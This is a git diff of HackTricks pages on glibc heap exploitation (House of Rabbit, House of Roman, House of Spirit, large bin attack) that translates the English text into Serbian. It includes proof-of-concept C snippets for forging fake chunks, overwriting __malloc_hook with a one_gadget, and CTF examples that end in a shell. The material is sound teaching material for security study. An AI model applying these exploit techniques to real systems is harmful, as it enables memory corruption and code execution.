+2. **Sposobnost aktiviranja `malloc_consolidate`**: To se može uraditi ili alokacijom velikog chunk-a ili spajanjem gornjeg chunk-a, što prisiljava heap da konsoliduje chunk-ove.
 
-### Goals
+### Ciljevi
 
-1. **Create overlapping chunks**: To have one chunk overlap with another, allowing for further heap manipulations.
-2. **Forge fake chunks**: To trick the allocator into treating a fake chunk as a legitimate chunk during heap operations.
+1. **Kreirati preklapajuće chunk-ove**: Da jedan chunk preklapa drugi, omogućavajući dalju manipulaciju heap-om.
+2. **Falsifikovati lažne chunk-ove**: Da prevarite alokator da tretira lažni chunk kao legitimni chunk tokom operacija na heap-u.
 
-## Steps of the attack
+## Koraci napada
 
-### POC 1: Modify the size of a fast bin chunk
+### POC 1: Modifikujte veličinu fast bin chunk-a
 
-**Objective**: Create an overlapping chunk by manipulating the size of a fastbin chunk.
-
-- **Step 1: Allocate Chunks**
+**Cilj**: Kreirati preklapajući chunk manipulacijom veličine fastbin chunk-a.
 
+- **Korak 1: Alocirajte chunk-ove**
 ```cpp
 unsigned long* chunk1 = malloc(0x40);  // Allocates a chunk of 0x40 bytes at 0x602000
 unsigned long* chunk2 = malloc(0x40);  // Allocates another chunk of 0x40 bytes at 0x602050
 malloc(0x10);                          // Allocates a small chunk to change the fastbin state
 ```
+Dodeljujemo dva dela od po 0x40 bajtova. Ovi delovi će biti smešteni u brzi bin list nakon što budu oslobođeni.
 
-We allocate two chunks of 0x40 bytes each. These chunks will be placed in the fast bin list once freed.
-
-- **Step 2: Free Chunks**
-
+- **Korak 2: Oslobodi delove**
 ```cpp
 free(chunk1);  // Frees the chunk at 0x602000
 free(chunk2);  // Frees the chunk at 0x602050
 ```
+Osobađamo oba dela, dodajući ih na fastbin listu.
 
-We free both chunks, adding them to the fastbin list.
-
-- **Step 3: Modify Chunk Size**
-
+- **Korak 3: Izmeni veličinu dela**
 ```cpp
 chunk1[-1] = 0xa1;  // Modify the size of chunk1 to 0xa1 (stored just before the chunk at chunk1[-1])
 ```
+Menjamo veličinu metapodataka `chunk1` na 0xa1. Ovo je ključni korak za prevaru alokatora tokom konsolidacije.
 
-We change the size metadata of `chunk1` to 0xa1. This is a crucial step to trick the allocator during consolidation.
-
-- **Step 4: Trigger `malloc_consolidate`**
-
+- **Korak 4: Aktiviraj `malloc_consolidate`**
 ```cpp
 malloc(0x1000);  // Allocate a large chunk to trigger heap consolidation
 ```
+Dodeljivanje velikog dela pokreće funkciju `malloc_consolidate`, spajajući male delove u brzim binovima. Manipulisana veličina `chunk1` uzrokuje da se preklapa sa `chunk2`.
 
-Allocating a large chunk triggers the `malloc_consolidate` function, merging small chunks in the fast bin. The manipulated size of `chunk1` causes it to overlap with `chunk2`.
+Nakon konsolidacije, `chunk1` se preklapa sa `chunk2`, omogućavajući dalju eksploataciju.
 
-After consolidation, `chunk1` overlaps with `chunk2`, allowing for further exploitation.
+### POC 2: Izmenite `fd` pokazivač
 
-### POC 2: Modify the `fd` pointer
-
-**Objective**: Create a fake chunk by manipulating the fast bin `fd` pointer.
-
-- **Step 1: Allocate Chunks**
+**Cilj**: Kreirati lažni deo manipulacijom `fd` pokazivača brzog bina.
 
+- **Korak 1: Dodelite delove**
 ```cpp
 unsigned long* chunk1 = malloc(0x40);  // Allocates a chunk of 0x40 bytes at 0x602000
 unsigned long* chunk2 = malloc(0x100); // Allocates a chunk of 0x100 bytes at 0x602050
 ```
+**Objašnjenje**: Alociramo dva dela, jedan manji i jedan veći, da bismo postavili heap za lažni deo.
 
-**Explanation**: We allocate two chunks, one smaller and one larger, to set up the heap for the fake chunk.
-
-- **Step 2: Create fake chunk**
-
+- **Korak 2: Kreiraj lažni deo**
 ```cpp
 chunk2[1] = 0x31;  // Fake chunk size 0x30
 chunk2[7] = 0x21;  // Next fake chunk
 chunk2[11] = 0x21; // Next-next fake chunk
 ```
+Pišemo lažne metapodatke o delu u `chunk2` da simuliramo manje delove.
 
-We write fake chunk metadata into `chunk2` to simulate smaller chunks.
-
-- **Step 3: Free `chunk1`**
-
+- **Korak 3: Oslobodi `chunk1`**
 ```cpp
 free(chunk1);  // Frees the chunk at 0x602000
 ```
+**Objašnjenje**: Oslobađamo `chunk1`, dodajući ga na fastbin listu.
 
-**Explanation**: We free `chunk1`, adding it to the fastbin list.
-
-- **Step 4: Modify `fd` of `chunk1`**
-
+- **Korak 4: Izmenite `fd` od `chunk1`**
 ```cpp
 chunk1[0] = 0x602060;  // Modify the fd of chunk1 to point to the fake chunk within chunk2
 ```
+**Objašnjenje**: Menjamo prednji pokazivač (`fd`) `chunk1` da pokazuje na naš lažni chunk unutar `chunk2`.
 
-**Explanation**: We change the forward pointer (`fd`) of `chunk1` to point to our fake chunk inside `chunk2`.
-
-- **Step 5: Trigger `malloc_consolidate`**
-
+- **Korak 5: Aktiviraj `malloc_consolidate`**
 ```cpp
 malloc(5000);  // Allocate a large chunk to trigger heap consolidation
 ```
+Dodeljivanje velikog dela ponovo pokreće `malloc_consolidate`, koji obrađuje lažni deo.
 
-Allocating a large chunk again triggers `malloc_consolidate`, which processes the fake chunk.
+Lažni deo postaje deo fastbin liste, čineći ga legitimnim delom za dalju eksploataciju.
 
-The fake chunk becomes part of the fastbin list, making it a legitimate chunk for further exploitation.
+### Sažetak
 
-### Summary
-
-The **House of Rabbit** technique involves either modifying the size of a fast bin chunk to create overlapping chunks or manipulating the `fd` pointer to create fake chunks. This allows attackers to forge legitimate chunks in the heap, enabling various forms of exploitation. Understanding and practicing these steps will enhance your heap exploitation skills.
+Tehnika **House of Rabbit** uključuje ili modifikovanje veličine fast bin dela kako bi se stvorili preklapajući delovi ili manipulaciju `fd` pokazivačem za kreiranje lažnih delova. Ovo omogućava napadačima da falsifikuju legitimne delove u heap-u, omogućavajući različite oblike eksploatacije. Razumevanje i vežbanje ovih koraka će poboljšati vaše veštine eksploatacije heap-a.
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/binary-exploitation/libc-heap/house-of-roman.md b/src/binary-exploitation/libc-heap/house-of-roman.md
index a3deaf939..0939d3f85 100644
--- a/src/binary-exploitation/libc-heap/house-of-roman.md
+++ b/src/binary-exploitation/libc-heap/house-of-roman.md
@@ -2,87 +2,82 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Basic Information
+## Osnovne informacije
 
-This was a very interesting technique that allowed for RCE without leaks via fake fastbins, the unsorted_bin attack and relative overwrites. However it has ben [**patched**](https://sourceware.org/git/?p=glibc.git;a=commitdiff;h=b90ddd08f6dd688e651df9ee89ca3a69ff88cd0c).
+Ovo je bila veoma zanimljiva tehnika koja je omogućila RCE bez leak-ova putem lažnih fastbins, napada na unsorted_bin i relativnih prepisivanja. Međutim, to je [**zakrpljeno**](https://sourceware.org/git/?p=glibc.git;a=commitdiff;h=b90ddd08f6dd688e651df9ee89ca3a69ff88cd0c).
 
-### Code
+### Kod
 
-- You can find an example in [https://github.com/shellphish/how2heap/blob/master/glibc_2.23/house_of_roman.c](https://github.com/shellphish/how2heap/blob/master/glibc_2.23/house_of_roman.c)
+- Možete pronaći primer na [https://github.com/shellphish/how2heap/blob/master/glibc_2.23/house_of_roman.c](https://github.com/shellphish/how2heap/blob/master/glibc_2.23/house_of_roman.c)
 
-### Goal
+### Cilj
 
-- RCE by abusing relative pointers
+- RCE zloupotrebom relativnih pokazivača
 
-### Requirements
+### Zahtevi
 
-- Edit fastbin and unsorted bin pointers
-- 12 bits of randomness must be brute forced (0.02% chance) of working
+- Urediti fastbin i unsorted bin pokazivače
+- 12 bita nasumičnosti mora biti brute-forced (0.02% šanse) da bi radilo
 
-## Attack Steps
+## Koraci napada
 
-### Part 1: Fastbin Chunk points to \_\_malloc_hook
+### Deo 1: Fastbin Chunk pokazuje na \_\_malloc_hook
 
-Create several chunks:
+Kreirajte nekoliko chunk-ova:
 
-- `fastbin_victim` (0x60, offset 0): UAF chunk later to edit the heap pointer later to point to the LibC value.
-- `chunk2` (0x80, offset 0x70): For good alignment
+- `fastbin_victim` (0x60, offset 0): UAF chunk koji će kasnije urediti pokazivač na heap da pokazuje na LibC vrednost.
+- `chunk2` (0x80, offset 0x70): Za dobru poravnanje
 - `main_arena_use` (0x80, offset 0x100)
-- `relative_offset_heap` (0x60, offset 0x190): relative offset on the 'main_arena_use' chunk
+- `relative_offset_heap` (0x60, offset 0x190): relativni offset na 'main_arena_use' chunk
 
-Then `free(main_arena_use)` which will place this chunk in the unsorted list and will get a pointer to `main_arena + 0x68` in both the `fd` and `bk` pointers.
+Zatim `free(main_arena_use)` koji će staviti ovaj chunk u unsorted listu i dobiti pokazivač na `main_arena + 0x68` u oba `fd` i `bk` pokazivača.
 
-Now it's allocated a new chunk `fake_libc_chunk(0x60)` because it'll contain the pointers to `main_arena + 0x68` in `fd` and `bk`.
-
-Then `relative_offset_heap` and `fastbin_victim` are freed.
+Sada se alocira novi chunk `fake_libc_chunk(0x60)` jer će sadržati pokazivače na `main_arena + 0x68` u `fd` i `bk`.
 
+Zatim se `relative_offset_heap` i `fastbin_victim` oslobađaju.
 ```c
 /*
 Current heap layout:
-	0x0:   fastbin_victim       - size 0x70
-	0x70:  alignment_filler     - size 0x90
-	0x100: fake_libc_chunk      - size 0x70 (contains a fd ptr to main_arena + 0x68)
-	0x170: leftover_main        - size 0x20
-	0x190: relative_offset_heap - size 0x70
+0x0:   fastbin_victim       - size 0x70
+0x70:  alignment_filler     - size 0x90
+0x100: fake_libc_chunk      - size 0x70 (contains a fd ptr to main_arena + 0x68)
+0x170: leftover_main        - size 0x20
+0x190: relative_offset_heap - size 0x70
 
-	bin layout:
-			fastbin:  fastbin_victim -> relative_offset_heap
-			unsorted: leftover_main
+bin layout:
+fastbin:  fastbin_victim -> relative_offset_heap
+unsorted: leftover_main
 */
 ```
+-  `fastbin_victim` ima `fd` koji pokazuje na `relative_offset_heap`
+-  `relative_offset_heap` je ofset udaljenosti od `fake_libc_chunk`, koji sadrži pokazivač na `main_arena + 0x68`
+- Promenom poslednjeg bajta `fastbin_victim.fd` moguće je da `fastbin_victim` pokazuje na `main_arena + 0x68`
 
--  `fastbin_victim` has a `fd` pointing to `relative_offset_heap`
--  `relative_offset_heap` is an offset of distance from `fake_libc_chunk`, which contains a pointer to `main_arena + 0x68`
-- Just changing the last byte of `fastbin_victim.fd` it's possible to make `fastbin_victim points` to `main_arena + 0x68`
+Za prethodne akcije, napadač treba da bude sposoban da modifikuje fd pokazivač `fastbin_victim`.
 
-For the previous actions, the attacker needs to be capable of modifying the fd pointer of `fastbin_victim`.
+Zatim, `main_arena + 0x68` nije toliko zanimljiv, pa hajde da ga modifikujemo tako da pokazivač pokazuje na **`__malloc_hook`**.
 
-Then, `main_arena + 0x68` is not that interesting, so lets modify it so the pointer points to **`__malloc_hook`**.
+Napomena da `__memalign_hook` obično počinje sa `0x7f` i nulama pre njega, tako da je moguće da se lažno predstavi kao vrednost u `0x70` brzom binu. Pošto su poslednja 4 bita adrese **nasumična**, postoji `2^4=16` mogućnosti za vrednost da završi na mestu koje nas zanima. Tako se ovde izvodi BF napad tako da se chunk završi kao: **`0x70: fastbin_victim -> fake_libc_chunk -> (__malloc_hook - 0x23)`.**
 
-Note that `__memalign_hook` usually starts with `0x7f` and zeros before it, then it's possible to fake it as a value in the `0x70` fast bin. Because the last 4 bits of the address are **random** there are `2^4=16` possibilities for the value to end pointing where are interested. So a BF attack is performed here so the chunk ends like: **`0x70: fastbin_victim -> fake_libc_chunk -> (__malloc_hook - 0x23)`.**
-
-(For more info about the rest of the bytes check the explanation in the [how2heap](https://github.com/shellphish/how2heap/blob/master/glibc_2.23/house_of_roman.c)[ example](https://github.com/shellphish/how2heap/blob/master/glibc_2.23/house_of_roman.c)). If the BF don't work the program just crashes (so start gain until it works).
-
-Then, 2 mallocs are performed to remove the 2 initial fast bin chunks and the a third one is alloced to get a chunk in the **`__malloc_hook:`**
+(Za više informacija o ostalim bajtovima proverite objašnjenje u [how2heap](https://github.com/shellphish/how2heap/blob/master/glibc_2.23/house_of_roman.c)[ primeru](https://github.com/shellphish/how2heap/blob/master/glibc_2.23/house_of_roman.c)). Ako BF ne uspe, program se jednostavno sruši (tako da ponovo pokušajte dok ne uspe).
 
+Zatim, izvršavaju se 2 malloc-a da se uklone 2 inicijalna fast bin chunk-a, a treći se alocira da dobije chunk u **`__malloc_hook:`**
 ```c
 malloc(0x60);
 malloc(0x60);
 uint8_t* malloc_hook_chunk = malloc(0x60);
 ```
+### Deo 2: Unsorted_bin napad
 
-### Part 2: Unsorted_bin attack
-
-For more info you can check:
+Za više informacija možete proveriti:
 
 {{#ref}}
 unsorted-bin-attack.md
 {{#endref}}
 
-But basically it allows to write `main_arena + 0x68` to any location by specified in `chunk->bk`. And for the attack we choose `__malloc_hook`. Then, after overwriting it we will use a relative overwrite) to point to a `one_gadget`.
-
-For this we start getting a chunk and putting it into the **unsorted bin**:
+Ali u suštini omogućava da se napiše `main_arena + 0x68` na bilo koju lokaciju koju odredimo u `chunk->bk`. I za napad biramo `__malloc_hook`. Zatim, nakon prepisivanja, koristićemo relativno prepisivanje da usmerimo na `one_gadget`.
 
+Za ovo počinjemo da dobijamo chunk i stavljamo ga u **unsorted bin**:
 ```c
 uint8_t* unsorted_bin_ptr = malloc(0x80);
 malloc(0x30); // Don't want to consolidate
@@ -91,25 +86,24 @@ puts("Put chunk into unsorted_bin\n");
 // Free the chunk to create the UAF
 free(unsorted_bin_ptr);
 ```
-
-Use an UAF in this chunk to point `unsorted_bin_ptr->bk` to the address of `__malloc_hook` (we brute forced this previously).
+Iskoristite UAF u ovom delu da usmerite `unsorted_bin_ptr->bk` na adresu `__malloc_hook` (to smo prethodno brute-forcovali).
 
 > [!CAUTION]
-> Note that this attack corrupts the unsorted bin (hence small and large too). So we can only **use allocations from the fast bin now** (a more complex program might do other allocations and crash), and to trigger this we must **alloc the same size or the program will crash.**
+> Imajte na umu da ovaj napad korumpira nesortiranu kantu (takođe malu i veliku). Dakle, možemo samo **koristiti alokacije iz brze kante sada** (kompleksniji program može izvršiti druge alokacije i srušiti se), a da bismo to pokrenuli, moramo **alokirati istu veličinu ili će se program srušiti.**
 
-So, to trigger the write of `main_arena + 0x68` in `__malloc_hook` we perform after setting `__malloc_hook` in `unsorted_bin_ptr->bk` we just need to do: **`malloc(0x80)`**
+Dakle, da bismo pokrenuli pisanje `main_arena + 0x68` u `__malloc_hook`, nakon postavljanja `__malloc_hook` u `unsorted_bin_ptr->bk` jednostavno treba da uradimo: **`malloc(0x80)`**
 
-### Step 3: Set \_\_malloc_hook to system
+### Korak 3: Postavite \_\_malloc_hook na sistem
 
-In the step one we ended controlling a chunk containing `__malloc_hook` (in the variable `malloc_hook_chunk`) and in the second step we managed to write `main_arena + 0x68` in here.
+U prvom koraku smo završili kontrolišući deo koji sadrži `__malloc_hook` (u varijabli `malloc_hook_chunk`), a u drugom koraku smo uspeli da napišemo `main_arena + 0x68` ovde.
 
-Now, we abuse a partial overwrite in `malloc_hook_chunk` to use the libc address we wrote there(`main_arena + 0x68`) to **point a `one_gadget` address**.
+Sada, zloupotrebljavamo delimično prepisivanje u `malloc_hook_chunk` da bismo koristili libc adresu koju smo napisali tamo (`main_arena + 0x68`) da **usmerimo adresu `one_gadget`**.
 
-Here is where it's needed to **bruteforce 12 bits of randomness** (more info in the [how2heap](https://github.com/shellphish/how2heap/blob/master/glibc_2.23/house_of_roman.c)[ example](https://github.com/shellphish/how2heap/blob/master/glibc_2.23/house_of_roman.c)).
+Ovde je potrebno **brute-forcovati 12 bita nasumičnosti** (više informacija u [how2heap](https://github.com/shellphish/how2heap/blob/master/glibc_2.23/house_of_roman.c)[ primeru](https://github.com/shellphish/how2heap/blob/master/glibc_2.23/house_of_roman.c)).
 
-Finally, one the correct address is overwritten, **call `malloc` and trigger the `one_gadget`**.
+Na kraju, kada je ispravna adresa prepisana, **pozovite `malloc` i pokrenite `one_gadget`**.
 
-## References
+## Reference
 
 - [https://github.com/shellphish/how2heap](https://github.com/shellphish/how2heap)
 - [https://github.com/shellphish/how2heap/blob/master/glibc_2.23/house_of_roman.c](https://github.com/shellphish/how2heap/blob/master/glibc_2.23/house_of_roman.c)
diff --git a/src/binary-exploitation/libc-heap/house-of-spirit.md b/src/binary-exploitation/libc-heap/house-of-spirit.md
index 1ce36fd14..a3a0ad45a 100644
--- a/src/binary-exploitation/libc-heap/house-of-spirit.md
+++ b/src/binary-exploitation/libc-heap/house-of-spirit.md
@@ -2,14 +2,13 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Basic Information
+## Osnovne informacije
 
-### Code
+### Kod
 
 

 
 House of Spirit
-
 ```c
 #include 
 #include 
@@ -19,99 +18,96 @@
 // Code altered to add som prints from: https://heap-exploitation.dhavalkapil.com/attacks/house_of_spirit
 
 struct fast_chunk {
-  size_t prev_size;
-  size_t size;
-  struct fast_chunk *fd;
-  struct fast_chunk *bk;
-  char buf[0x20];               // chunk falls in fastbin size range
+size_t prev_size;
+size_t size;
+struct fast_chunk *fd;
+struct fast_chunk *bk;
+char buf[0x20];               // chunk falls in fastbin size range
 };
 
 int main() {
-  struct fast_chunk fake_chunks[2];   // Two chunks in consecutive memory
-  void *ptr, *victim;
+struct fast_chunk fake_chunks[2];   // Two chunks in consecutive memory
+void *ptr, *victim;
 
-  ptr = malloc(0x30);
+ptr = malloc(0x30);
 
-  printf("Original alloc address: %p\n", ptr);
-  printf("Main fake chunk:%p\n", &fake_chunks[0]);
-  printf("Second fake chunk for size: %p\n", &fake_chunks[1]);
+printf("Original alloc address: %p\n", ptr);
+printf("Main fake chunk:%p\n", &fake_chunks[0]);
+printf("Second fake chunk for size: %p\n", &fake_chunks[1]);
 
-  // Passes size check of "free(): invalid size"
-  fake_chunks[0].size = sizeof(struct fast_chunk);
+// Passes size check of "free(): invalid size"
+fake_chunks[0].size = sizeof(struct fast_chunk);
 
-  // Passes "free(): invalid next size (fast)"
-  fake_chunks[1].size = sizeof(struct fast_chunk);
+// Passes "free(): invalid next size (fast)"
+fake_chunks[1].size = sizeof(struct fast_chunk);
 
-  // Attacker overwrites a pointer that is about to be 'freed'
-  // Point to .fd as it's the start of the content of the chunk
-  ptr = (void *)&fake_chunks[0].fd;
+// Attacker overwrites a pointer that is about to be 'freed'
+// Point to .fd as it's the start of the content of the chunk
+ptr = (void *)&fake_chunks[0].fd;
 
-  free(ptr);
+free(ptr);
 
-  victim = malloc(0x30);
-  printf("Victim: %p\n", victim);
+victim = malloc(0x30);
+printf("Victim: %p\n", victim);
 
-  return 0;
+return 0;
 }
 ```
-
 

 
-### Goal
+### Cilj
 
-- Be able to add into the tcache / fast bin an address so later it's possible to allocate it
+- Moći dodati adresu u tcache / fast bin kako bi kasnije mogla da se alocira
 
-### Requirements
+### Zahtevi
 
-- This attack requires an attacker to be able to create a couple of fake fast chunks indicating correctly the size value of it and then to be able to free the first fake chunk so it gets into the bin.
+- Ovaj napad zahteva da napadač može da kreira nekoliko lažnih fast chunk-ova koji ispravno označavaju vrednost veličine, a zatim da može da oslobodi prvi lažni chunk kako bi ušao u bin.
 
-### Attack
+### Napad
 
-- Create fake chunks that bypasses security checks: you will need 2 fake chunks basically indicating in the correct positions the correct sizes
-- Somehow manage to free the first fake chunk so it gets into the fast or tcache bin and then it's allocate it to overwrite that address
-
-**The code from** [**guyinatuxedo**](https://guyinatuxedo.github.io/39-house_of_spirit/house_spirit_exp/index.html) **is great to understand the attack.** Although this schema from the code summarises it pretty good:
+- Kreirati lažne chunk-ove koji zaobilaze bezbednosne provere: biće vam potrebna 2 lažna chunk-a koja su osnovno postavljena na ispravnim pozicijama sa ispravnim veličinama
+- Na neki način osloboditi prvi lažni chunk kako bi ušao u fast ili tcache bin, a zatim ga alocirati da prepiše tu adresu
 
+**Kod od** [**guyinatuxedo**](https://guyinatuxedo.github.io/39-house_of_spirit/house_spirit_exp/index.html) **je odličan za razumevanje napada.** Iako ova šema iz koda to prilično dobro sumira:
 ```c
 /*
-    this will be the structure of our two fake chunks:
-    assuming that you compiled it for x64
+this will be the structure of our two fake chunks:
+assuming that you compiled it for x64
 
-    +-------+---------------------+------+
-    | 0x00: | Chunk # 0 prev size | 0x00 |
-    +-------+---------------------+------+
-    | 0x08: | Chunk # 0 size      | 0x60 |
-    +-------+---------------------+------+
-    | 0x10: | Chunk # 0 content   | 0x00 |
-    +-------+---------------------+------+
-    | 0x60: | Chunk # 1 prev size | 0x00 |
-    +-------+---------------------+------+
-    | 0x68: | Chunk # 1 size      | 0x40 |
-    +-------+---------------------+------+
-    | 0x70: | Chunk # 1 content   | 0x00 |
-    +-------+---------------------+------+
++-------+---------------------+------+
+| 0x00: | Chunk # 0 prev size | 0x00 |
++-------+---------------------+------+
+| 0x08: | Chunk # 0 size      | 0x60 |
++-------+---------------------+------+
+| 0x10: | Chunk # 0 content   | 0x00 |
++-------+---------------------+------+
+| 0x60: | Chunk # 1 prev size | 0x00 |
++-------+---------------------+------+
+| 0x68: | Chunk # 1 size      | 0x40 |
++-------+---------------------+------+
+| 0x70: | Chunk # 1 content   | 0x00 |
++-------+---------------------+------+
 
-    for what we are doing the prev size values don't matter too much
-    the important thing is the size values of the heap headers for our fake chunks
+for what we are doing the prev size values don't matter too much
+the important thing is the size values of the heap headers for our fake chunks
 */
 ```
-
 > [!NOTE]
-> Note that it's necessary to create the second chunk in order to bypass some sanity checks.
+> Imajte na umu da je potrebno kreirati drugi deo kako bi se zaobišle neke provere.
 
-## Examples
+## Primeri
 
 - **CTF** [**https://guyinatuxedo.github.io/39-house_of_spirit/hacklu14_oreo/index.html**](https://guyinatuxedo.github.io/39-house_of_spirit/hacklu14_oreo/index.html)
 
-  - **Libc infoleak**: Via an overflow it's possible to change a pointer to point to a GOT address in order to leak a libc address via the read action of the CTF
-  - **House of Spirit**: Abusing a counter that counts the number of "rifles" it's possible to generate a fake size of the first fake chunk, then abusing a "message" it's possible to fake the second size of a chunk and finally abusing an overflow it's possible to change a pointer that is going to be freed so our first fake chunk is freed. Then, we can allocate it and inside of it there is going to be the address to where "message" is stored. Then, it's possible to make this point to the `scanf` entry inside the GOT table, so we can overwrite it with the address to system.\
-    Next time `scanf` is called, we can send the input `"/bin/sh"` and get a shell.
+- **Libc infoleak**: Putem prelivanja moguće je promeniti pokazivač da pokazuje na GOT adresu kako bi se otkrila libc adresa putem akcije čitanja CTF-a.
+- **House of Spirit**: Zloupotrebom brojača koji broji broj "pušaka" moguće je generisati lažnu veličinu prvog lažnog dela, zatim zloupotrebom "poruke" moguće je lažirati drugu veličinu dela i konačno zloupotrebom prelivanja moguće je promeniti pokazivač koji će biti oslobođen tako da se naš prvi lažni deo oslobodi. Tada možemo alocirati i unutar njega će biti adresa na kojoj je "poruka" smeštena. Tada je moguće usmeriti ovo na `scanf` ulaz unutar GOT tabele, tako da možemo prepisati sa adresom do sistema.\
+Sledeći put kada se pozove `scanf`, možemo poslati ulaz `"/bin/sh"` i dobiti shell.
 
 - [**Gloater. HTB Cyber Apocalypse CTF 2024**](https://7rocky.github.io/en/ctf/other/htb-cyber-apocalypse/gloater/)
-  - **Glibc leak**: Uninitialized stack buffer.
-  - **House of Spirit**: We can modify the first index of a global array of heap pointers. With a single byte modification, we use `free` on a fake chunk inside a valid chunk, so that we get an overlapping chunks situation after allocating again. With that, a simple Tcache poisoning attack works to get an arbitrary write primitive.
+- **Glibc leak**: Neinicijalizovani bafer na steku.
+- **House of Spirit**: Možemo modifikovati prvi indeks globalnog niza pokazivača na heap. Sa jednom modifikacijom bajta, koristimo `free` na lažnom delu unutar validnog dela, tako da dobijemo situaciju preklapanja delova nakon ponovne alokacije. Sa tim, jednostavan Tcache trovanje napad funkcioniše da dobijemo proizvoljnu pisanu primitivnu.
 
-## References
+## Reference
 
 - [https://heap-exploitation.dhavalkapil.com/attacks/house_of_spirit](https://heap-exploitation.dhavalkapil.com/attacks/house_of_spirit)
 
diff --git a/src/binary-exploitation/libc-heap/large-bin-attack.md b/src/binary-exploitation/libc-heap/large-bin-attack.md
index fb8a721c9..cb97f715f 100644
--- a/src/binary-exploitation/libc-heap/large-bin-attack.md
+++ b/src/binary-exploitation/libc-heap/large-bin-attack.md
@@ -4,55 +4,53 @@
 
 ## Basic Information
 
-For more information about what is a large bin check this page:
+Za više informacija o tome šta je veliki bin, proverite ovu stranicu:
 
 {{#ref}}
 bins-and-memory-allocations.md
 {{#endref}}
 
-It's possible to find a great example in [**how2heap - large bin attack**](https://github.com/shellphish/how2heap/blob/master/glibc_2.35/large_bin_attack.c).
+Moguće je pronaći odličan primer u [**how2heap - large bin attack**](https://github.com/shellphish/how2heap/blob/master/glibc_2.35/large_bin_attack.c).
 
-Basically here you can see how, in the latest "current" version of glibc (2.35), it's not checked: **`P->bk_nextsize`** allowing to modify an arbitrary address with the value of a large bin chunk if certain conditions are met.
+U suštini, ovde možete videti kako, u najnovijoj "trenutnoj" verziji glibc (2.35), nije provereno: **`P->bk_nextsize`** što omogućava modifikaciju proizvoljne adrese sa vrednošću velikog bin chunk-a ako su ispunjeni određeni uslovi.
 
-In that example you can find the following conditions:
+U tom primeru možete pronaći sledeće uslove:
 
-- A large chunk is allocated
-- A large chunk smaller than the first one but in the same index is allocated
-  - Must be smalled so in the bin it must go first
-- (A chunk to prevent merging with the top chunk is created)
-- Then, the first large chunk is freed and a new chunk bigger than it is allocated -> Chunk1 goes to the large bin
-- Then, the second large chunk is freed
-- Now, the vulnerability: The attacker can modify `chunk1->bk_nextsize` to `[target-0x20]`
-- Then, a larger chunk than chunk 2 is allocated, so chunk2 is inserted in the large bin overwriting the address `chunk1->bk_nextsize->fd_nextsize` with the address of chunk2
+- Veliki chunk je alociran
+- Veliki chunk manji od prvog, ali u istom indeksu, je alociran
+- Mora biti manji tako da mora ići prvi u bin
+- (Chunk za sprečavanje spajanja sa top chunk-om je kreiran)
+- Zatim, prvi veliki chunk je oslobođen i novi chunk veći od njega je alociran -> Chunk1 ide u veliki bin
+- Zatim, drugi veliki chunk je oslobođen
+- Sada, ranjivost: Napadač može modifikovati `chunk1->bk_nextsize` na `[target-0x20]`
+- Zatim, alocira se veći chunk od chunk 2, tako da se chunk2 ubacuje u veliki bin prepisujući adresu `chunk1->bk_nextsize->fd_nextsize` sa adresom chunk2
 
 > [!TIP]
-> There are other potential scenarios, the thing is to add to the large bin a chunk that is **smaller** than a current X chunk in the bin, so it need to be inserted just before it in the bin, and we need to be able to modify X's **`bk_nextsize`** as thats where the address of the smaller chunk will be written to.
-
-This is the relevant code from malloc. Comments have been added to understand better how the address was overwritten:
+> Postoje i drugi potencijalni scenariji, stvar je dodati u veliki bin chunk koji je **manji** od trenutnog X chunk-a u bin-u, tako da treba biti umetnut neposredno pre njega u bin, i moramo biti u mogućnosti da modifikujemo X-ov **`bk_nextsize`** jer će se tu zapisati adresa manjeg chunk-a.
 
+Ovo je relevantan kod iz malloc. Komentari su dodati da bi se bolje razumelo kako je adresa prepisana:
 ```c
 /* if smaller than smallest, bypass loop below */
 assert (chunk_main_arena (bck->bk));
 if ((unsigned long) (size) < (unsigned long) chunksize_nomask (bck->bk))
-  {
-    fwd = bck; // fwd = p1
-    bck = bck->bk; // bck = p1->bk
+{
+fwd = bck; // fwd = p1
+bck = bck->bk; // bck = p1->bk
 
-    victim->fd_nextsize = fwd->fd; // p2->fd_nextsize = p1->fd (Note that p1->fd is p1 as it's the only chunk)
-    victim->bk_nextsize = fwd->fd->bk_nextsize; // p2->bk_nextsize = p1->fd->bk_nextsize
-    fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim; // p1->fd->bk_nextsize->fd_nextsize = p2
-  }
+victim->fd_nextsize = fwd->fd; // p2->fd_nextsize = p1->fd (Note that p1->fd is p1 as it's the only chunk)
+victim->bk_nextsize = fwd->fd->bk_nextsize; // p2->bk_nextsize = p1->fd->bk_nextsize
+fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim; // p1->fd->bk_nextsize->fd_nextsize = p2
+}
 ```
+Ovo se može koristiti za **prepisivanje `global_max_fast` globalne promenljive** libc kako bi se iskoristio fast bin napad sa većim delovima.
 
-This could be used to **overwrite the `global_max_fast` global variable** of libc to then exploit a fast bin attack with larger chunks.
+Možete pronaći još jedno odlično objašnjenje ovog napada u [**guyinatuxedo**](https://guyinatuxedo.github.io/32-largebin_attack/largebin_explanation0/index.html).
 
-You can find another great explanation of this attack in [**guyinatuxedo**](https://guyinatuxedo.github.io/32-largebin_attack/largebin_explanation0/index.html).
-
-### Other examples
+### Ostali primeri
 
 - [**La casa de papel. HackOn CTF 2024**](https://7rocky.github.io/en/ctf/other/hackon-ctf/la-casa-de-papel/)
-  - Large bin attack in the same situation as it appears in [**how2heap**](https://github.com/shellphish/how2heap/blob/master/glibc_2.35/large_bin_attack.c).
-  - The write primitive is more complex, because `global_max_fast` is useless here.
-  - FSOP is needed to finish the exploit.
+- Large bin napad u istoj situaciji kao što se pojavljuje u [**how2heap**](https://github.com/shellphish/how2heap/blob/master/glibc_2.35/large_bin_attack.c).
+- Write primitiv je složeniji, jer je `global_max_fast` ovde beskoristan.
+- FSOP je potreban da se završi eksploatacija.
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/binary-exploitation/libc-heap/off-by-one-overflow.md b/src/binary-exploitation/libc-heap/off-by-one-overflow.md
index 000044db5..3d889775c 100644
--- a/src/binary-exploitation/libc-heap/off-by-one-overflow.md
+++ b/src/binary-exploitation/libc-heap/off-by-one-overflow.md
@@ -4,112 +4,110 @@
 
 ## Basic Information
 
-Having just access to a 1B overflow allows an attacker to modify the `size` field from the next chunk. This allows to tamper which chunks are actually freed, potentially generating a chunk that contains another legit chunk. The exploitation is similar to [double free](double-free.md) or overlapping chunks.
